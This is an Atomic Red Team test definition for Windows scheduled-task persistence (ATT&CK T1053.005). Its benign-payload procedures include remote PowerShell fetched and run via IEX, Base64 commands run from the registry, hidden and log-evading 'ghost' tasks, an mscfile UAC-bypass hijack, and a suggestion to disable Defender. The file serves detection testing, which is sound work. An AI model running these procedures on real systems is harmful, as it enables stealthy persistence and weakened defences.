attack_technique: T1053.005 display_name: 'Scheduled Task/Job: Scheduled Task' atomic_tests: - name: Scheduled Task Startup Script auto_generated_guid: fec27f65-db86-4c2d-b66c-61945aee87c2 description: | Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view the tasks, open the Task Scheduler and look in the Active Tasks pane. supported_platforms: - windows executor: command: | schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe" schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe" cleanup_command: | schtasks /delete /tn "T1053_005_OnLogon" /f >nul 2>&1 schtasks /delete /tn "T1053_005_OnStartup" /f >nul 2>&1 name: command_prompt elevation_required: true - name: Scheduled task Local auto_generated_guid: 42f53695-ad4a-4546-abb6-7d837f644a71 description: | Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. supported_platforms: - windows input_arguments: task_command: description: What you want to execute type: string default: C:\windows\system32\cmd.exe time: description: What time 24 Hour type: string default: "20:10" executor: name: command_prompt elevation_required: false command: | SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} cleanup_command: | SCHTASKS /Delete /TN spawn /F >nul 2>&1 - name: Scheduled task Remote auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd description: | Create a task on a remote system. Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint. supported_platforms: - windows input_arguments: task_command: description: What you want to execute type: string default: C:\windows\system32\cmd.exe time: description: What time 24 Hour type: string default: "20:10" target: description: Target type: string default: localhost user_name: description: 'Username to authenticate with, format: DOMAIN\User' type: string default: DOMAIN\user password: description: Password to authenticate with type: string default: At0micStrong executor: name: command_prompt elevation_required: true command: | SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} cleanup_command: | SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1 - name: Powershell Cmdlet Scheduled Task auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd description: | Create an atomic scheduled task that leverages native powershell cmdlets. Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10. supported_platforms: - windows executor: name: powershell elevation_required: false command: | $Action = New-ScheduledTaskAction -Execute "calc.exe" $Trigger = New-ScheduledTaskTrigger -AtLogon $User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest $Set = New-ScheduledTaskSettingsSet $object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set Register-ScheduledTask AtomicTask -InputObject $object cleanup_command: | Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 - name: Task Scheduler via VBA auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 description: | This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within 30 - 40 seconds after this module has run supported_platforms: - windows input_arguments: ms_product: description: Maldoc application Word type: string default: Word dependency_executor_name: powershell dependencies: - description: | Microsoft #{ms_product} must be installed prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} Stop-Process -Name $process exit 0 } catch { exit 1 } get_prereq_command: | Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler" name: powershell cleanup_command: | Unregister-ScheduledTask -TaskName "Run Notepad" -Confirm:$false - name: WMI Invoke-CimMethod Scheduled Task auto_generated_guid: e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b description: | Create an scheduled task that executes notepad.exe after user login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. supported_platforms: - windows input_arguments: xml_path: description: path of vbs to use when creating masquerading files type: path default: PathToAtomicsFolder\T1053.005\src\T1053_005_WMI.xml dependency_executor_name: powershell dependencies: - description: | File to copy must exist on disk at specified location (#{xml_path}) prereq_command: | if (Test-Path "#{xml_path}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "#{xml_path}") -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1053.005/src/T1053_005_WMI.xml" -OutFile "#{xml_path}" executor: name: powershell elevation_required: true command: | $xml = [System.IO.File]::ReadAllText("#{xml_path}") Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; } cleanup_command: | Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false >$null 2>&1 - name: Scheduled Task Executing Base64 Encoded Commands From Registry auto_generated_guid: e895677d-4f06-49ab-91b6-ae3742d0a2ba description: | A Base64 Encoded command will be stored in the registry (ping 127.0.0.1) and then a scheduled task will be created. The scheduled task will launch powershell to decode and run the command in the registry daily. This is a persistence mechanism recently seen in use by Qakbot. [Additiona Information](https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/) supported_platforms: - windows input_arguments: time: description: Daily scheduled task execution time type: string default: '07:45' executor: command: | reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time} cleanup_command: | schtasks /delete /tn "ATOMIC-T1053.005" /F >nul 2>&1 reg delete HKCU\SOFTWARE\ATOMIC-T1053.005 /F >nul 2>&1 name: command_prompt - name: Import XML Schedule Task with Hidden Attribute auto_generated_guid: cd925593-fbb4-486d-8def-16cbdf944bf4 description: | Create an scheduled task that executes calc.exe after user login from XML that contains hidden setting attribute. This technique was seen several times in tricbot malware and also with the targetted attack campaigne the industroyer2. supported_platforms: - windows input_arguments: xml_path: description: path of vbs to use when creating masquerading files type: path default: PathToAtomicsFolder\T1053.005\src\T1053_05_SCTASK_HIDDEN_ATTRIB.xml dependency_executor_name: powershell dependencies: - description: | File to copy must exist on disk at specified location (#{xml_path}) prereq_command: | if (Test-Path "#{xml_path}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "#{xml_path}") -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1053.005/src/T1053_05_SCTASK_HIDDEN_ATTRIB.xml" -OutFile "#{xml_path}" executor: name: powershell elevation_required: true command: | $xml = [System.IO.File]::ReadAllText("#{xml_path}") Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; } cleanup_command: | Unregister-ScheduledTask -TaskName "atomic red team" -confirm:$false >$null 2>&1 - name: PowerShell Modify A Scheduled Task auto_generated_guid: dda6fc7b-c9a6-4c18-b98d-95ec6542af6d description: | Create a scheduled task with an action and modify the action to do something else. The initial idea is to showcase Microsoft Windows TaskScheduler Operational log modification of an action on a Task already registered. It will first be created to spawn cmd.exe, but modified to run notepad.exe. Upon successful execution, powershell.exe will create a scheduled task and modify the action. supported_platforms: - windows executor: name: powershell elevation_required: false command: | $Action = New-ScheduledTaskAction -Execute "cmd.exe" $Trigger = New-ScheduledTaskTrigger -AtLogon $User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest $Set = New-ScheduledTaskSettingsSet $object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set Register-ScheduledTask AtomicTaskModifed -InputObject $object $NewAction = New-ScheduledTaskAction -Execute "Notepad.exe" Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction cleanup_command: | Unregister-ScheduledTask -TaskName "AtomicTaskModifed" -confirm:$false >$null 2>&1 - name: Scheduled Task ("Ghost Task") via Registry Key Manipulation auto_generated_guid: 704333ca-cc12-4bcf-9916-101844881f54 description: | Create a scheduled task through manipulation of registry keys. This procedure is implemented using the [GhostTask](https://github.com/netero1010/GhostTask) utility. By manipulating registry keys under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree, the tool creates user-specified scheduled tasks without a corresponding Windows Event 4698, which is logged when scheduled tasks are created through conventional means. This requires a download of the GhostTask binary, which must be run as NT Authority\SYSTEM. Upon successful execution of this test, a scheduled task will be set to run at logon which launches notepad.exe or runs a user-specified command. For further exploration of this procedure and guidance for hunting and detection, see [Hunting G-G-G-GhostTasks!](https://medium.com/p/154b50ab6a78). supported_platforms: - windows input_arguments: task_name: description: Name of the newly-added task type: string default: lilghostie task_command: description: Command you want the task to execute type: string default: notepad.exe target: description: System where the task should run type: string default: localhost user_name: description: Username to authenticate with, such as ATOMICDOMAIN\AtomicAdmin type: string default: $env:USERDOMAIN + '\' + $env:USERNAME dependency_executor_name: powershell dependencies: - description: | PsExec tool from Sysinternals must exist in the ExternalPayloads directory prereq_command: | if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe") { exit 0} else { exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" "PathToAtomicsFolder\..\ExternalPayloads\PsTools" -Force Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe" "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -Force - description: | GhostTask.exe tool from netero101 must exist in the ExternalPayloads directory. This tool may be quarantined by windows defender; disable windows defender real-time protection to fix it or add the ExternalPayloads directory as an exclusion, using a command like `Add-MpPreference -ExclusionPath "PathToAtomicsFolder\..\ExternalPayloads\"` prereq_command: | if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe") { exit 0} else { exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Invoke-WebRequest "https://github.com/netero1010/GhostTask/releases/download/1.0/GhostTask.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" executor: name: command_prompt elevation_required: true command: | "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe" "PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} add #{task_name} "cmd.exe" "/c #{task_command}" #{user_name} logon cleanup_command: | "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe" "PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} delete #{task_name} > nul - name: Scheduled Task Persistence via CompMgmt.msc auto_generated_guid: 8fcfa3d5-ea7d-4e1c-bd3e-3c4ed315b7d2 description: | Adds persistence by abusing `compmgmt.msc` via a scheduled task. When the Computer Management console is opened, it will run a malicious payload (in this case, `calc.exe`). This technique abuses scheduled tasks and registry modifications to hijack legitimate system processes. supported_platforms: - windows input_arguments: task_name: description: Name of the newly-created scheduled task type: string default: CompMgmtBypass payload: description: Command you want the task to execute type: string default: calc.exe executor: name: command_prompt elevation_required: true command: | reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f schtasks /Create /TN "#{task_name}" /TR "compmgmt.msc" /SC ONLOGON /RL HIGHEST /F ECHO Let's open the Computer Management console now... compmgmt.msc cleanup_command: | reg delete "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /f schtasks /Delete /TN "#{task_name}" /F - name: Scheduled Task Persistence via Eventviewer.msc auto_generated_guid: 02124c37-767e-4b76-9383-c9fc366d9d4c description: | Adds persistence by abusing `eventviewer.msc` via a scheduled task. When the eventviewer console is opened, it will run a malicious payload (in this case, `calc.exe`). supported_platforms: - windows input_arguments: task_name: description: Name of the newly-created scheduled task type: string default: EventViewerBypass payload: description: Command you want the task to execute type: string default: calc.exe executor: name: command_prompt elevation_required: true command: | reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f schtasks /Create /TN "#{task_name}" /TR "eventvwr.msc" /SC ONLOGON /RL HIGHEST /F ECHO Let's run the schedule task ... schtasks /Run /TN "EventViewerBypass" cleanup_command: | reg delete "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /f schtasks /Delete /TN "#{task_name}" /F